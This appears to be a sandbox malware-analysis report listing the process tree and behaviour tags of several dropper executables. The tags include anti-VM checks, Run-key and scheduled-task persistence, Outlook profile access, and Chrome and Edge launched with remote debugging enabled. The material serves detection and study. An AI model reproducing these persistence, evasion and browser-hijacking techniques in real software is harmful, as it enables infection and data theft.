PID 1732 wrote to memory of 4804 1732 firefox.exe 82 PID 1732 wrote to memory of 4804 1732 firefox.exe 82 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook gvndxfghs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook gvndxfghs.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:628
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:460
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:984
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:880
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1056
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1068
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1116
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1196
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1224
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1308
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1336
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1460
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2772
-
C:\Windows\system32\control.exe"C:\Windows\system32\control.exe" netconnections3⤵PID:6008
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1500
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1596
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1604
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1704
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1740
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1812
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1856
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1936
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1944
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2012
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1880
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2092
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2220
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2316
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2492
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2500
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:2560
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2604
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2632
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2664
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2700
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2908
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2624
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3288
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Downloaders.zip"2⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:744
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3528 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1980 -parentBuildID 20240401114208 -prefsHandle 1908 -prefMapHandle 1900 -prefsLen 23678 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3161dffa-d518-43bc-a967-1df2b3b9a58e} 1732 "\\.\pipe\gecko-crash-server-pipe.1732" gpu4⤵PID:1828
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2396 -parentBuildID 20240401114208 -prefsHandle 2388 -prefMapHandle 2384 -prefsLen 23714 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {acf2fedb-2a47-4a06-a32f-5f80c58dca04} 1732 "\\.\pipe\gecko-crash-server-pipe.1732" socket4⤵PID:4804
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3236 -childID 1 -isForBrowser -prefsHandle 3228 -prefMapHandle 3224 -prefsLen 23855 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9d7a3262-dfe4-4b6a-8ec1-b80f2df9fc07} 1732 "\\.\pipe\gecko-crash-server-pipe.1732" tab4⤵PID:224
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2944 -childID 2 -isForBrowser -prefsHandle 3064 -prefMapHandle 1672 -prefsLen 29088 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bfaaacb7-cf49-4aa9-afff-343b15059858} 1732 "\\.\pipe\gecko-crash-server-pipe.1732" tab4⤵PID:432
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4472 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4476 -prefMapHandle 4432 -prefsLen 29088 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {01f3be9b-8f4d-4336-82d2-8473c9fe8e48} 1732 "\\.\pipe\gecko-crash-server-pipe.1732" utility4⤵
- Checks processor information in registry
PID:2528
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5040 -childID 3 -isForBrowser -prefsHandle 5348 -prefMapHandle 5360 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bcf0706e-f820-44e2-a29a-3c2c68c47f36} 1732 "\\.\pipe\gecko-crash-server-pipe.1732" tab4⤵PID:1864
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5456 -childID 4 -isForBrowser -prefsHandle 5432 -prefMapHandle 5440 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b523f0ff-4d45-456b-b4d3-f30434d6e430} 1732 "\\.\pipe\gecko-crash-server-pipe.1732" tab4⤵PID:1776
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5716 -childID 5 -isForBrowser -prefsHandle 5816 -prefMapHandle 5820 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {58c426a0-99b8-48fa-af8c-dd4d2284a17f} 1732 "\\.\pipe\gecko-crash-server-pipe.1732" tab4⤵PID:708
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4020 -childID 6 -isForBrowser -prefsHandle 3760 -prefMapHandle 3764 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6036b515-1d92-49c8-95ba-bf9d0975f45e} 1732 "\\.\pipe\gecko-crash-server-pipe.1732" tab4⤵PID:1480
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5116 -childID 7 -isForBrowser -prefsHandle 1540 -prefMapHandle 1632 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {812a371c-f470-4ff3-bb49-1aec2c2f60d1} 1732 "\\.\pipe\gecko-crash-server-pipe.1732" tab4⤵PID:952
-
-
-
-
C:\Program Files (x86)\procexp64.exe"C:\Program Files (x86)\procexp64.exe"2⤵
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Sets service image path in registry
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Program Files directory
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2684
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.virustotal.com/about/terms-of-service2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:2156 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xbc,0x10c,0x7ffbd57f3cb8,0x7ffbd57f3cc8,0x7ffbd57f3cd83⤵PID:3392
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1864,7138245166682001943,16417540867462801033,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1868 /prefetch:23⤵PID:4180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1864,7138245166682001943,16417540867462801033,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:2152
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1864,7138245166682001943,16417540867462801033,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2592 /prefetch:83⤵PID:2216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,7138245166682001943,16417540867462801033,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:13⤵PID:5248
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,7138245166682001943,16417540867462801033,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:13⤵PID:5256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,7138245166682001943,16417540867462801033,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4948 /prefetch:13⤵PID:5672
-
-
-
C:\Users\Admin\Desktop\4363463463464363463463463.exe"C:\Users\Admin\Desktop\4363463463464363463463463.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5932 -
C:\Users\Admin\Desktop\Files\pei.exe"C:\Users\Admin\Desktop\Files\pei.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2044 -
C:\Users\Admin\AppData\Local\Temp\1352515001.exeC:\Users\Admin\AppData\Local\Temp\1352515001.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:704
-
-
-
C:\Users\Admin\Desktop\Files\random.exe"C:\Users\Admin\Desktop\Files\random.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5996
-
-
C:\Users\Admin\Desktop\Files\hack1226.exe"C:\Users\Admin\Desktop\Files\hack1226.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5284
-
-
C:\Users\Admin\Desktop\Files\tdrpload.exe"C:\Users\Admin\Desktop\Files\tdrpload.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5968 -
C:\Windows\sysnldcvmr.exeC:\Windows\sysnldcvmr.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2568 -
C:\Users\Admin\AppData\Local\Temp\3245516675.exeC:\Users\Admin\AppData\Local\Temp\3245516675.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:7020 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵PID:6720
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:5940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵PID:6888
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:6456
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\166715695.exeC:\Users\Admin\AppData\Local\Temp\166715695.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2416 -
C:\Users\Admin\AppData\Local\Temp\1465331686.exeC:\Users\Admin\AppData\Local\Temp\1465331686.exe6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:8252
-
-
-
C:\Users\Admin\AppData\Local\Temp\79144613.exeC:\Users\Admin\AppData\Local\Temp\79144613.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:8348
-
-
C:\Users\Admin\AppData\Local\Temp\262792613.exeC:\Users\Admin\AppData\Local\Temp\262792613.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7780
-
-
C:\Users\Admin\AppData\Local\Temp\2433825779.exeC:\Users\Admin\AppData\Local\Temp\2433825779.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7832 -
C:\Users\Admin\AppData\Local\Temp\1989520276.exeC:\Users\Admin\AppData\Local\Temp\1989520276.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7448 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7448 -s 243967⤵
- Program crash
PID:7848
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2785416532.exeC:\Users\Admin\AppData\Local\Temp\2785416532.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
PID:1920 -
C:\Users\Admin\sysnldcvmr.exeC:\Users\Admin\sysnldcvmr.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5008 -
C:\Users\Admin\AppData\Local\Temp\211929483.exeC:\Users\Admin\AppData\Local\Temp\211929483.exe7⤵
- Executes dropped EXE
PID:8640 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f8⤵PID:6688
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f9⤵PID:6988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"8⤵PID:7252
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"9⤵PID:7836
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2704917330.exeC:\Users\Admin\AppData\Local\Temp\2704917330.exe7⤵
- Executes dropped EXE
PID:7460
-
-
C:\Users\Admin\AppData\Local\Temp\89648440.exeC:\Users\Admin\AppData\Local\Temp\89648440.exe7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6228
-
-
C:\Users\Admin\AppData\Local\Temp\1223029666.exeC:\Users\Admin\AppData\Local\Temp\1223029666.exe7⤵
- Executes dropped EXE
PID:4452
-
-
C:\Users\Admin\AppData\Local\Temp\1810918076.exeC:\Users\Admin\AppData\Local\Temp\1810918076.exe7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7896
-
-
-
-
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5620 -
C:\Users\Admin\Desktop\a\URGMwM6.exe"C:\Users\Admin\Desktop\a\URGMwM6.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
PID:1092
-
-
C:\Users\Admin\Desktop\a\Winsvc.exe"C:\Users\Admin\Desktop\a\Winsvc.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3540 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"4⤵PID:6732
-
-
-
C:\Users\Admin\Desktop\a\TPB-1.exe"C:\Users\Admin\Desktop\a\TPB-1.exe"3⤵
- Executes dropped EXE
- Checks processor information in registry
PID:4652 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
PID:2984 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffbd1b7cc40,0x7ffbd1b7cc4c,0x7ffbd1b7cc585⤵PID:5236
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1892,i,5979866096049464806,6834857774695582931,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1888 /prefetch:25⤵PID:6964
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1788,i,5979866096049464806,6834857774695582931,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1996 /prefetch:35⤵PID:6912
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2228,i,5979866096049464806,6834857774695582931,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2184 /prefetch:85⤵PID:7080
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3140,i,5979866096049464806,6834857774695582931,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3148 /prefetch:15⤵
- Uses browser remote debugging
PID:6756
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3188,i,5979866096049464806,6834857774695582931,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3176 /prefetch:15⤵
- Uses browser remote debugging
PID:6440
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4212,i,5979866096049464806,6834857774695582931,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4280 /prefetch:15⤵
- Uses browser remote debugging
PID:5328
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4740,i,5979866096049464806,6834857774695582931,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4152 /prefetch:85⤵PID:6952
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:8312 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffbd57f3cb8,0x7ffbd57f3cc8,0x7ffbd57f3cd85⤵PID:8328
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1880,1405972146855269295,556044683817610962,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1900 /prefetch:25⤵PID:8652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1880,1405972146855269295,556044683817610962,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 /prefetch:35⤵PID:8660
-
-
